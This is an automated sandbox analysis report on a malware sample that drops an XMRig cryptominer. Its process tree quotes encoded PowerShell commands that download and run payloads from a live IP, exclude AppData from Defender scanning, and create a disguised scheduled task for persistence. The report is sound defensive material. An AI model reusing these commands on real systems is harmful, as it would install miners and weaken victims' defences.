Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    05-01-2023 08:50

General

  • Target

    file.exe

  • Size

    35KB

  • MD5

    481b0735ab411bdb1a96ad9e8543124a

  • SHA1

    a4346eaeb23abc1bcb239dbbb25d71cfb6758fdd

  • SHA256

    55007e5a5bb57dbd7c9c4137cb452ef7cef8c40d268eeac4de7f40e49e8b9e25

  • SHA512

    931205de82bc7d40fb099998c133c09fbc58afa480f334f2c4cb5ccbf05c35cd1b7031e9e99e3bb61a54433c4af42cd763f65e639b5359efc5568dab23e04132

  • SSDEEP

    768:wBwq4czQCBbp6jqEJgqPy4r/wOPpdwMNhghy0q9:wBwruQC1sn64kmTghy0o

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.194/go.png

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://62.204.41.194/F1.exe

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.194/me.png

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 14 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1884
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1228
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:992
      • C:\Users\Admin\AppData\Roaming\NoSleep.exe
        "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1728
        • C:\Windows\System32\conhost.exe
          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:816
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:316
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""
              6⤵
              • Creates scheduled task(s)
              PID:1152
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1928
            • C:\Windows\system32\schtasks.exe
              schtasks /run /tn "GoogleUpdateTaskMachineQC"
              6⤵
                PID:756
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2024
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:428
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {4C4B6469-B2CD-4FFE-A37A-ECC52B805CA6} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1756
      • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1456
        • C:\Windows\System32\conhost.exe
          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
          3⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1436
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe "cvxjxkjice"
            4⤵
              PID:1944
            • C:\Windows\System32\conhost.exe
              C:\Windows\System32\conhost.exe pjsnsurpv0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZebSGUfj6Vuv+kPoPZ9FoidkTm/7TRz3Cxu5/LqhuwWCS2hvmHfyPTAWIo4zY5OcwjP+79VuJh5O5c9vMH8WB3WKocLPQQ3D/631f214VrDNh9z0jOLbJJ9YXALTSKeo3z0yqpo23wDcDd1T/hDfuDceoldVJQGMTDTCXN0Q0os5qQZpM/bbi7sbKmKkdCHj6mFIu02fq5LlHaQLCNyvHRzVgK320/ko7oR3JyhnmBQHtbZUpiFNPFJEf7lTC77qWxEJ3h4yjiCPgrTI6MoBbSgjAmpPlQgNd71RJ7lG0ikmSTeoT3CddgZH5TjpSuHbPN3ha82GVaI5+j+dJzAfNAaJfxYNDrhTxng1MpRAutdkSftro/iAbX8hcx7q/b7Qg7J3CyclBC4/Mwe/Jeo6Q9AKf6F7/3Yi99ifKM20LuEsFK/pU/n4DnNACnryf3RdME
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1728

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        a31817e30d78538184ad637a1c38f0f0

        SHA1

        b4b923cee1977afa0c384372d2201b9f0048e340

        SHA256

        0a8a64fba8c165e48df273ee23adf458a1d7dd905dd78c2fcd11909b758a05f9

        SHA512

        72a2954514a7188737f0e4868d99b510af8698bfb2c1f59f8aeafa9b3fe071c86eb23c7c9a15e5b06133f4c52a2b8764062fe0940797eca47f0b96549b0eb3ad

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        a31817e30d78538184ad637a1c38f0f0

        SHA1

        b4b923cee1977afa0c384372d2201b9f0048e340

        SHA256

        0a8a64fba8c165e48df273ee23adf458a1d7dd905dd78c2fcd11909b758a05f9

        SHA512

        72a2954514a7188737f0e4868d99b510af8698bfb2c1f59f8aeafa9b3fe071c86eb23c7c9a15e5b06133f4c52a2b8764062fe0940797eca47f0b96549b0eb3ad

      • C:\Users\Admin\AppData\Roaming\NoSleep.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • C:\Users\Admin\AppData\Roaming\NoSleep.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • \Users\Admin\AppData\Roaming\NoSleep.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • \Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • memory/316-99-0x0000000000000000-mapping.dmp
      • memory/428-64-0x000007FEF4E60000-0x000007FEF5883000-memory.dmp
        Filesize

        10.1MB

      • memory/428-107-0x0000000002A1B000-0x0000000002A3A000-memory.dmp
        Filesize

        124KB

      • memory/428-77-0x000000001B780000-0x000000001BA7F000-memory.dmp
        Filesize

        3.0MB

      • memory/428-71-0x0000000002A14000-0x0000000002A17000-memory.dmp
        Filesize

        12KB

      • memory/428-57-0x0000000000000000-mapping.dmp
      • memory/428-115-0x0000000002A14000-0x0000000002A17000-memory.dmp
        Filesize

        12KB

      • memory/428-69-0x000007FEF4300000-0x000007FEF4E5D000-memory.dmp
        Filesize

        11.4MB

      • memory/428-116-0x0000000002A1B000-0x0000000002A3A000-memory.dmp
        Filesize

        124KB

      • memory/428-87-0x0000000002A14000-0x0000000002A17000-memory.dmp
        Filesize

        12KB

      • memory/428-81-0x0000000002A1B000-0x0000000002A3A000-memory.dmp
        Filesize

        124KB

      • memory/756-103-0x0000000000000000-mapping.dmp
      • memory/816-96-0x000000001BAF0000-0x000000001BF4C000-memory.dmp
        Filesize

        4.4MB

      • memory/816-98-0x000000001B690000-0x000000001BAC4000-memory.dmp
        Filesize

        4.2MB

      • memory/816-97-0x0000000000260000-0x00000000006BB000-memory.dmp
        Filesize

        4.4MB

      • memory/992-89-0x0000000002784000-0x0000000002787000-memory.dmp
        Filesize

        12KB

      • memory/992-56-0x0000000000000000-mapping.dmp
      • memory/992-79-0x000000001B720000-0x000000001BA1F000-memory.dmp
        Filesize

        3.0MB

      • memory/992-67-0x000007FEF4E60000-0x000007FEF5883000-memory.dmp
        Filesize

        10.1MB

      • memory/992-82-0x000000000278B000-0x00000000027AA000-memory.dmp
        Filesize

        124KB

      • memory/992-95-0x000000000278B000-0x00000000027AA000-memory.dmp
        Filesize

        124KB

      • memory/992-74-0x0000000002784000-0x0000000002787000-memory.dmp
        Filesize

        12KB

      • memory/992-76-0x000007FEF4300000-0x000007FEF4E5D000-memory.dmp
        Filesize

        11.4MB

      • memory/1152-102-0x0000000000000000-mapping.dmp
      • memory/1228-75-0x000007FEF4300000-0x000007FEF4E5D000-memory.dmp
        Filesize

        11.4MB

      • memory/1228-90-0x0000000002314000-0x0000000002317000-memory.dmp
        Filesize

        12KB

      • memory/1228-91-0x000000000231B000-0x000000000233A000-memory.dmp
        Filesize

        124KB

      • memory/1228-55-0x0000000000000000-mapping.dmp
      • memory/1228-59-0x000007FEFC101000-0x000007FEFC103000-memory.dmp
        Filesize

        8KB

      • memory/1228-88-0x0000000002314000-0x0000000002317000-memory.dmp
        Filesize

        12KB

      • memory/1228-78-0x000000001B760000-0x000000001BA5F000-memory.dmp
        Filesize

        3.0MB

      • memory/1228-65-0x000007FEF4E60000-0x000007FEF5883000-memory.dmp
        Filesize

        10.1MB

      • memory/1228-73-0x0000000002314000-0x0000000002317000-memory.dmp
        Filesize

        12KB

      • memory/1228-83-0x000000000231B000-0x000000000233A000-memory.dmp
        Filesize

        124KB

      • memory/1436-108-0x0000000002590000-0x0000000002596000-memory.dmp
        Filesize

        24KB

      • memory/1456-105-0x0000000000000000-mapping.dmp
      • memory/1728-141-0x0000000000220000-0x0000000000240000-memory.dmp
        Filesize

        128KB

      • memory/1728-118-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1728-128-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1728-135-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1728-129-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1728-142-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1728-123-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1728-143-0x0000000000000000-0x0000000001000000-memory.dmp
        Filesize

        16.0MB

      • memory/1728-131-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1728-133-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1728-137-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1728-140-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1728-138-0x000000014036EAC4-mapping.dmp
      • memory/1728-134-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1728-144-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1728-93-0x0000000000000000-mapping.dmp
      • memory/1728-127-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1728-119-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1728-121-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1728-125-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1884-54-0x0000000000B10000-0x0000000000B20000-memory.dmp
        Filesize

        64KB

      • memory/1928-101-0x0000000000000000-mapping.dmp
      • memory/1944-109-0x0000000000060000-0x0000000000079000-memory.dmp
        Filesize

        100KB

      • memory/1944-114-0x0000000001D90000-0x0000000001D9E000-memory.dmp
        Filesize

        56KB

      • memory/1944-113-0x0000000000300000-0x000000000031A000-memory.dmp
        Filesize

        104KB

      • memory/1944-112-0x0000000000060000-0x0000000000079000-memory.dmp
        Filesize

        100KB

      • memory/1944-111-0x0000000000000000-mapping.dmp
      • memory/2024-84-0x000000000236B000-0x000000000238A000-memory.dmp
        Filesize

        124KB

      • memory/2024-58-0x0000000000000000-mapping.dmp
      • memory/2024-68-0x000007FEF4E60000-0x000007FEF5883000-memory.dmp
        Filesize

        10.1MB

      • memory/2024-72-0x0000000002364000-0x0000000002367000-memory.dmp
        Filesize

        12KB

      • memory/2024-70-0x000007FEF4300000-0x000007FEF4E5D000-memory.dmp
        Filesize

        11.4MB

      • memory/2024-85-0x0000000002364000-0x0000000002367000-memory.dmp
        Filesize

        12KB

      • memory/2024-86-0x000000000236B000-0x000000000238A000-memory.dmp
        Filesize

        124KB

      • memory/2024-80-0x000000001B7E0000-0x000000001BADF000-memory.dmp
        Filesize

        3.0MB